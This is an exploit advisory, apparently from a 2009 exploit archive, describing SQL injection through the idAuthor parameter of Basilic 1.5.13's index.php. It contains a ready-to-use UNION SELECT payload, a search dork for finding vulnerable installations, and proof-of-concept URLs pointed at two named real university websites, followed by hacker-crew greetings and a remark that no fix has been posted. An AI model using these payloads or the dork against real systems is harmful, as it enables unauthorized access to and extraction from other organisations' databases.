Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability

2009-07-24 16:33:27

==================================================================================================


[o] Basilic 1.5.13 SQL Injection Vulnerability

Software : Basilic version 1.5.13
Vendor : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


==================================================================================================


[o] Vulnerable file


index.php



[o] Exploit

http://localhost/[path]/index.php?idAuthor=[SQL]



[o] Proof of concept

http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
http://www.iarc.uaf.edu/publications/allpubs.php?idAuthor=-19+union+select+1,version()--



[o] Dork

"Powered by Basilic"


==================================================================================================


[o] Greetz

MainHack BrotherHood [ http://mainhack.net ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.